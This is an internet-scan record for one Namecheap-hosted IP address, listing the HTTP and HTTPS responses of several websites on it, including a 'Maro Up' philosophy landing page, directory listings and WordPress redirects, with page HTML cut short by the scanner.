Host 162.0.235.244
United States
NAMECHEAP-NET
Software information

LiteSpeed LiteSpeed

tcp/443 tcp/80

  • Open service 162.0.235.244:80 · www.maroup.xyz

    2026-01-24 17:54

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 24 Jan 2026 17:48:53 GMT
    accept-ranges: bytes
    content-length: 14847
    date: Sat, 24 Jan 2026 17:54:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Maro Up | The Philosophy of Wahei Takeda
    
    <!DOCTYPE html>
    <html lang="en" class="scroll-smooth">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Maro Up | The Philosophy of Wahei Takeda</title>
        <script src="https://cdn.tailwindcss.com"></script>
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Cormorant+Garamond:ital,wght@0,300;0,600;1,400&family=Noto+Sans+JP:wght@100;400;900&display=swap" rel="stylesheet">
        <style>
            :root {
                --bg: #ffffff;
                --fg: #000000;
            }
    
            body {
                background-color: var(--bg);
                color: var(--fg);
                font-family: 'Noto Sans JP', sans-serif;
                overflow-x: hidden;
            }
    
            .serif {
                font-family: 'Cormorant Garamond', serif;
            }
    
            .reveal {
                opacity: 0;
                transform: translateY(30px);
                transition: all 0.8s ease-out;
            }
    
            .reveal.active {
                opacity: 1;
                transform: translateY(0);
            }
    
            .maro-stroke {
                -webkit-text-stroke: 1px black;
                color: transparent;
                transition: color 0.5s ease;
            }
    
            .maro-stroke:hover {
                color: black;
            }
    
            .custom-cursor {
                width: 20px;
                height: 20px;
                border: 1px solid black;
                border-radius: 50%;
                position: fixed;
                pointer-events: none;
                z-index: 9999;
                transition: transform 0.1s ease;
                mix-blend-mode: difference;
                background: white;
            }
    
            @keyframes marquee {
                0% { transform: translateX(0); }
                100% { transform: translateX(-50%); }
            }
    
            .marquee-container {
                overflow: hidden;
                white-space: nowrap;
            }
    
            .marquee-content {
                display: inline-block;
                animation: marquee 20s linear infinite;
            }
    
            .japanese-bg {
                position: absolute;
                font-size: 40vh;
                font-weight: 900;
                opacity: 0.03;
                z-index: -1;
                pointer-events: none;
                user-select: none;
            }
        </style>
    </head>
    <body class="antialiased">
    
        <div id="cursor" class="custom-cursor hidden md:block"></div>
    
        <!-- Navigation -->
        <nav class="fixed top-0 w-full z-50 flex justify-between items-center px-8 py-6 mix-blend-difference text-white">
            <div class="text-xl font-bold tracking-tighter uppercase">Maro Up</div>
            <div class="hidden md:flex space-x-12 text-sm uppercase tracking-widest">
                <a href="#about" class="hover:line-through transition">The Philosophy</a>
                <a href="#wahei" class="hover:line-through transition">Wahei Takeda</a>
                <a href="#action" class="hover:line-through transition">Practice</a>
            </div>
            <div class="md:hidden">
                <span class="text-xs">MENU</span>
            </div>
        </nav>
    
        <!-- Hero Section -->
        <section class="h-screen flex flex-col justify-center items-center relative overflow-hidden px-4">
            <div class="japanese-bg top-1/2 left-1/2 -translate-x-1/2 -translate-y-1/2">真心</div>
            
            <div class="text-center z-10">
                <p class="reveal text-xs md:text-sm tracking-[0.5em] uppercase mb-8 opacity-60">The Path of Sincerity</p>
                <h1 class="reveal delay-200 text-7xl md:text-[12rem] font-black leading-none tracking-tighter uppercase italic">
                    Maro <span class="maro-stroke italic">Up!</span>
                </h1>
                <div class="reveal delay-500 mt-12 serif text-2xl md:text-3xl italic max-w-2xl mx-auto font-light leading-relaxed">
                    "When your Maro is up, the world opens its arms to you."
                </div>
        
    Found 2026-01-24 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.maroup.xyz

    2026-01-24 17:54

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 24 Jan 2026 17:48:53 GMT
    accept-ranges: bytes
    content-length: 14847
    date: Sat, 24 Jan 2026 17:54:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Maro Up | The Philosophy of Wahei Takeda
    
    <!DOCTYPE html>
    <html lang="en" class="scroll-smooth">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Maro Up | The Philosophy of Wahei Takeda</title>
        <script src="https://cdn.tailwindcss.com"></script>
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Cormorant+Garamond:ital,wght@0,300;0,600;1,400&family=Noto+Sans+JP:wght@100;400;900&display=swap" rel="stylesheet">
        <style>
            :root {
                --bg: #ffffff;
                --fg: #000000;
            }
    
            body {
                background-color: var(--bg);
                color: var(--fg);
                font-family: 'Noto Sans JP', sans-serif;
                overflow-x: hidden;
            }
    
            .serif {
                font-family: 'Cormorant Garamond', serif;
            }
    
            .reveal {
                opacity: 0;
                transform: translateY(30px);
                transition: all 0.8s ease-out;
            }
    
            .reveal.active {
                opacity: 1;
                transform: translateY(0);
            }
    
            .maro-stroke {
                -webkit-text-stroke: 1px black;
                color: transparent;
                transition: color 0.5s ease;
            }
    
            .maro-stroke:hover {
                color: black;
            }
    
            .custom-cursor {
                width: 20px;
                height: 20px;
                border: 1px solid black;
                border-radius: 50%;
                position: fixed;
                pointer-events: none;
                z-index: 9999;
                transition: transform 0.1s ease;
                mix-blend-mode: difference;
                background: white;
            }
    
            @keyframes marquee {
                0% { transform: translateX(0); }
                100% { transform: translateX(-50%); }
            }
    
            .marquee-container {
                overflow: hidden;
                white-space: nowrap;
            }
    
            .marquee-content {
                display: inline-block;
                animation: marquee 20s linear infinite;
            }
    
            .japanese-bg {
                position: absolute;
                font-size: 40vh;
                font-weight: 900;
                opacity: 0.03;
                z-index: -1;
                pointer-events: none;
                user-select: none;
            }
        </style>
    </head>
    <body class="antialiased">
    
        <div id="cursor" class="custom-cursor hidden md:block"></div>
    
        <!-- Navigation -->
        <nav class="fixed top-0 w-full z-50 flex justify-between items-center px-8 py-6 mix-blend-difference text-white">
            <div class="text-xl font-bold tracking-tighter uppercase">Maro Up</div>
            <div class="hidden md:flex space-x-12 text-sm uppercase tracking-widest">
                <a href="#about" class="hover:line-through transition">The Philosophy</a>
                <a href="#wahei" class="hover:line-through transition">Wahei Takeda</a>
                <a href="#action" class="hover:line-through transition">Practice</a>
            </div>
            <div class="md:hidden">
                <span class="text-xs">MENU</span>
            </div>
        </nav>
    
        <!-- Hero Section -->
        <section class="h-screen flex flex-col justify-center items-center relative overflow-hidden px-4">
            <div class="japanese-bg top-1/2 left-1/2 -translate-x-1/2 -translate-y-1/2">真心</div>
            
            <div class="text-center z-10">
                <p class="reveal text-xs md:text-sm tracking-[0.5em] uppercase mb-8 opacity-60">The Path of Sincerity</p>
                <h1 class="reveal delay-200 text-7xl md:text-[12rem] font-black leading-none tracking-tighter uppercase italic">
                    Maro <span class="maro-stroke italic">Up!</span>
                </h1>
                <div class="reveal delay-500 mt-12 serif text-2xl md:text-3xl italic max-w-2xl mx-auto font-light leading-relaxed">
                    "When your Maro is up, the world opens its arms to you."
                </div>
        
    Found 2026-01-24 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · maroup.xyz

    2026-01-24 17:54

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 24 Jan 2026 17:48:53 GMT
    accept-ranges: bytes
    content-length: 14847
    date: Sat, 24 Jan 2026 17:54:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Maro Up | The Philosophy of Wahei Takeda
    
    <!DOCTYPE html>
    <html lang="en" class="scroll-smooth">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Maro Up | The Philosophy of Wahei Takeda</title>
        <script src="https://cdn.tailwindcss.com"></script>
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Cormorant+Garamond:ital,wght@0,300;0,600;1,400&family=Noto+Sans+JP:wght@100;400;900&display=swap" rel="stylesheet">
        <style>
            :root {
                --bg: #ffffff;
                --fg: #000000;
            }
    
            body {
                background-color: var(--bg);
                color: var(--fg);
                font-family: 'Noto Sans JP', sans-serif;
                overflow-x: hidden;
            }
    
            .serif {
                font-family: 'Cormorant Garamond', serif;
            }
    
            .reveal {
                opacity: 0;
                transform: translateY(30px);
                transition: all 0.8s ease-out;
            }
    
            .reveal.active {
                opacity: 1;
                transform: translateY(0);
            }
    
            .maro-stroke {
                -webkit-text-stroke: 1px black;
                color: transparent;
                transition: color 0.5s ease;
            }
    
            .maro-stroke:hover {
                color: black;
            }
    
            .custom-cursor {
                width: 20px;
                height: 20px;
                border: 1px solid black;
                border-radius: 50%;
                position: fixed;
                pointer-events: none;
                z-index: 9999;
                transition: transform 0.1s ease;
                mix-blend-mode: difference;
                background: white;
            }
    
            @keyframes marquee {
                0% { transform: translateX(0); }
                100% { transform: translateX(-50%); }
            }
    
            .marquee-container {
                overflow: hidden;
                white-space: nowrap;
            }
    
            .marquee-content {
                display: inline-block;
                animation: marquee 20s linear infinite;
            }
    
            .japanese-bg {
                position: absolute;
                font-size: 40vh;
                font-weight: 900;
                opacity: 0.03;
                z-index: -1;
                pointer-events: none;
                user-select: none;
            }
        </style>
    </head>
    <body class="antialiased">
    
        <div id="cursor" class="custom-cursor hidden md:block"></div>
    
        <!-- Navigation -->
        <nav class="fixed top-0 w-full z-50 flex justify-between items-center px-8 py-6 mix-blend-difference text-white">
            <div class="text-xl font-bold tracking-tighter uppercase">Maro Up</div>
            <div class="hidden md:flex space-x-12 text-sm uppercase tracking-widest">
                <a href="#about" class="hover:line-through transition">The Philosophy</a>
                <a href="#wahei" class="hover:line-through transition">Wahei Takeda</a>
                <a href="#action" class="hover:line-through transition">Practice</a>
            </div>
            <div class="md:hidden">
                <span class="text-xs">MENU</span>
            </div>
        </nav>
    
        <!-- Hero Section -->
        <section class="h-screen flex flex-col justify-center items-center relative overflow-hidden px-4">
            <div class="japanese-bg top-1/2 left-1/2 -translate-x-1/2 -translate-y-1/2">真心</div>
            
            <div class="text-center z-10">
                <p class="reveal text-xs md:text-sm tracking-[0.5em] uppercase mb-8 opacity-60">The Path of Sincerity</p>
                <h1 class="reveal delay-200 text-7xl md:text-[12rem] font-black leading-none tracking-tighter uppercase italic">
                    Maro <span class="maro-stroke italic">Up!</span>
                </h1>
                <div class="reveal delay-500 mt-12 serif text-2xl md:text-3xl italic max-w-2xl mx-auto font-light leading-relaxed">
                    "When your Maro is up, the world opens its arms to you."
                </div>
        
    Found 2026-01-24 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · maroup.xyz

    2026-01-24 17:54

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 24 Jan 2026 17:48:53 GMT
    accept-ranges: bytes
    content-length: 14847
    date: Sat, 24 Jan 2026 17:54:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Maro Up | The Philosophy of Wahei Takeda
    
    <!DOCTYPE html>
    <html lang="en" class="scroll-smooth">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Maro Up | The Philosophy of Wahei Takeda</title>
        <script src="https://cdn.tailwindcss.com"></script>
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Cormorant+Garamond:ital,wght@0,300;0,600;1,400&family=Noto+Sans+JP:wght@100;400;900&display=swap" rel="stylesheet">
        <style>
            :root {
                --bg: #ffffff;
                --fg: #000000;
            }
    
            body {
                background-color: var(--bg);
                color: var(--fg);
                font-family: 'Noto Sans JP', sans-serif;
                overflow-x: hidden;
            }
    
            .serif {
                font-family: 'Cormorant Garamond', serif;
            }
    
            .reveal {
                opacity: 0;
                transform: translateY(30px);
                transition: all 0.8s ease-out;
            }
    
            .reveal.active {
                opacity: 1;
                transform: translateY(0);
            }
    
            .maro-stroke {
                -webkit-text-stroke: 1px black;
                color: transparent;
                transition: color 0.5s ease;
            }
    
            .maro-stroke:hover {
                color: black;
            }
    
            .custom-cursor {
                width: 20px;
                height: 20px;
                border: 1px solid black;
                border-radius: 50%;
                position: fixed;
                pointer-events: none;
                z-index: 9999;
                transition: transform 0.1s ease;
                mix-blend-mode: difference;
                background: white;
            }
    
            @keyframes marquee {
                0% { transform: translateX(0); }
                100% { transform: translateX(-50%); }
            }
    
            .marquee-container {
                overflow: hidden;
                white-space: nowrap;
            }
    
            .marquee-content {
                display: inline-block;
                animation: marquee 20s linear infinite;
            }
    
            .japanese-bg {
                position: absolute;
                font-size: 40vh;
                font-weight: 900;
                opacity: 0.03;
                z-index: -1;
                pointer-events: none;
                user-select: none;
            }
        </style>
    </head>
    <body class="antialiased">
    
        <div id="cursor" class="custom-cursor hidden md:block"></div>
    
        <!-- Navigation -->
        <nav class="fixed top-0 w-full z-50 flex justify-between items-center px-8 py-6 mix-blend-difference text-white">
            <div class="text-xl font-bold tracking-tighter uppercase">Maro Up</div>
            <div class="hidden md:flex space-x-12 text-sm uppercase tracking-widest">
                <a href="#about" class="hover:line-through transition">The Philosophy</a>
                <a href="#wahei" class="hover:line-through transition">Wahei Takeda</a>
                <a href="#action" class="hover:line-through transition">Practice</a>
            </div>
            <div class="md:hidden">
                <span class="text-xs">MENU</span>
            </div>
        </nav>
    
        <!-- Hero Section -->
        <section class="h-screen flex flex-col justify-center items-center relative overflow-hidden px-4">
            <div class="japanese-bg top-1/2 left-1/2 -translate-x-1/2 -translate-y-1/2">真心</div>
            
            <div class="text-center z-10">
                <p class="reveal text-xs md:text-sm tracking-[0.5em] uppercase mb-8 opacity-60">The Path of Sincerity</p>
                <h1 class="reveal delay-200 text-7xl md:text-[12rem] font-black leading-none tracking-tighter uppercase italic">
                    Maro <span class="maro-stroke italic">Up!</span>
                </h1>
                <div class="reveal delay-500 mt-12 serif text-2xl md:text-3xl italic max-w-2xl mx-auto font-light leading-relaxed">
                    "When your Maro is up, the world opens its arms to you."
                </div>
        
    Found 2026-01-24 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · nexusjobs.shop

    2026-01-24 17:10

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1365
    date: Sat, 24 Jan 2026 17:10:32 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="192390494">2026-01-23 17:48</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at nexusjobs.shop Port 80</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-24 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · nexusjobs.shop

    2026-01-24 17:10

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1366
    date: Sat, 24 Jan 2026 17:10:32 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="192390494">2026-01-23 17:48</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at nexusjobs.shop Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-24 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.ssjobsreviews.site

    2026-01-23 19:09

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://ssjobsreviews.site/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 23 Jan 2026 19:09:58 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.ssjobsreviews.site

    2026-01-23 19:09

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Fri, 23 Jan 2026 19:09:56 GMT
    server: LiteSpeed
    location: https://www.ssjobsreviews.site/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · ssjobsreviews.site

    2026-01-23 18:02

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1369
    date: Fri, 23 Jan 2026 18:02:46 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="192390898">2026-01-23 17:54</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at ssjobsreviews.site Port 80</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · ssjobsreviews.site

    2026-01-23 18:02

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1370
    date: Fri, 23 Jan 2026 18:02:46 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="192390898">2026-01-23 17:54</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at ssjobsreviews.site Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.slotspin88.com

    2026-01-23 16:30

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://slotspin88.com/
    server-timing: 
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 23 Jan 2026 16:30:08 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.rifaaps.devdecimosite2025.com

    2026-01-23 16:19

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://rifaaps.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 23 Jan 2026 16:19:42 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.platonika.study

    2026-01-23 16:16

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    set-cookie: pll_language=en; expires=Sat, 23-Jan-2027 16:16:18 GMT; Max-Age=31536000; path=/; secure; SameSite=Lax
    x-redirect-by: WordPress
    location: https://platonika.study/
    cache-control: public, max-age=0
    expires: Fri, 23 Jan 2026 16:16:19 GMT
    content-length: 0
    date: Fri, 23 Jan 2026 16:16:19 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · platonika.study

    2026-01-23 16:03

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    cache-control: public
    expires: Fri, 23 Jan 2026 16:04:00 GMT
    content-type: text/html
    accept-ranges: bytes
    content-length: 326350
    date: Fri, 23 Jan 2026 16:04:00 GMT
    server: LiteSpeed
    x-speedycache-source: Server
    cache-tag: platonika.study
    cdn-cache-control: max-age=1296000
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home - Platonika Learning
    
    <!DOCTYPE html>
    <html lang="en-CA">
    <head>
    <meta charset="UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="pingback" href="https://platonika.study/xmlrpc.php"/>
    <title>Home - Platonika Learning</title><link rel="preload" as="image" href="http://platonika.study/wp-content/uploads/2024/09/logo-original.png" />
    <meta name='robots' content='index, max-snippet:-1, max-image-preview:large, max-video-preview:-1, follow'/>
    <link rel="alternate" href="https://platonika.study/" hreflang="en"/>
    <link rel="alternate" href="https://platonika.study/uk/" hreflang="uk"/>
    <link rel="alternate" href="https://platonika.study/ru/" hreflang="ru"/>
    <link rel="canonical" href="https://platonika.study/"/>
    <meta name="description" content=""><script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","@id":"https://platonika.study/#","name":"","url":"https://platonika.study","logo":{"@type":"ImageObject","@id":"https://platonika.study/#logo","inLanguage":"en-CA"},"description":"Platonika Learning","sameAs":["https://x.com/"]}</script><meta property="og:url" content="https://platonika.study/"/><meta property="og:site_name" content="Platonika Learning"/><meta property="og:locale" content="en_CA"/><meta property="og:type" content="website"/><meta property="og:title" content="Home - Platonika Learning"/><meta name="twitter:card" content="summary"/><meta name="twitter:locale" content="en_CA"/><meta name="twitter:title" content="Home - Platonika Learning"/><meta name="twitter:url" content="https://platonika.study/"/><link rel='dns-prefetch' href='//fonts.googleapis.com'/>
    <link rel="alternate" type="application/rss+xml" title="Platonika Learning &raquo; Feed" href="https://platonika.study/feed/"/>
    <link rel="alternate" type="application/rss+xml" title="Platonika Learning &raquo; Comments Feed" href="https://platonika.study/comments/feed/"/>
    <meta content="Divi v.4.27.4" name="generator"/><link rel="stylesheet" href="https://platonika.study/wp-content/cache/speedycache/platonika.study/assets/d32c85ed80eeadc0-d32c85ed80eeadc0-combined.css" />
    <style id='wp-block-library-theme-inline-css' type='text/css'>.wp-block-audio :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio :where(figcaption){color:#ffffffa6}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote:where(.has-text-align-right){border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote:where(.has-text-align-center){border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote:where(.is-style-plain){border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-se
    Found 2026-01-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · aiagora.net

    2026-01-23 15:58

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://aiagora.net/wp-json/>; rel="https://api.w.org/"
    link: <https://aiagora.net/wp-json/wp/v2/pages/10>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://aiagora.net/>; rel=shortlink
    etag: "140-1768606421;;;"
    x-litespeed-cache: hit
    content-length: 41849
    date: Fri, 23 Jan 2026 15:58:53 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Agora
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script data-mp=true data-cfasync=false>window.MOTIONPAGE_FRONT={version:"2.2.2"}</script><style>body{visibility:hidden;}</style>
    <script data-mp=true data-cfasync=false>document.addEventListener("DOMContentLoaded",()=>(document.body.style.visibility="inherit"));</script>
    <noscript><style>body{visibility:inherit;}</style></noscript><meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
    
